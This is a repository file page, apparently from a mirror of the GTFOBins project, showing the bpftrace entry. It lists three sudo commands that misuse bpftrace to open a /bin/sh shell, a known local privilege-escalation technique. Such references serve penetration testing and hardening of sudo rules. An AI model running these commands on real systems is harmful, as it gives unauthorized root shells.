This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
390c49394a972fac96ed3475d0fe36bf52eaa266
GTFOBins.github.io
/
_gtfobins
/
bpftrace.md
Andrea Cardaci
1f9dbbf6eb
Improve bpftrace sudo shell
2020-01-03 14:11:37 +01:00
260 B
Raw
Blame
History
functions
functions
sudo
code
sudo bpftrace -e 'BEGIN {system("/bin/sh");exit()}'
code
TF=$(mktemp) echo 'BEGIN {system("/bin/sh");exit()}' >$TF sudo bpftrace $TF
code
sudo bpftrace -c /bin/sh -e 'END {exit()}'
Reference in New Issue
View Git Blame
Copy Permalink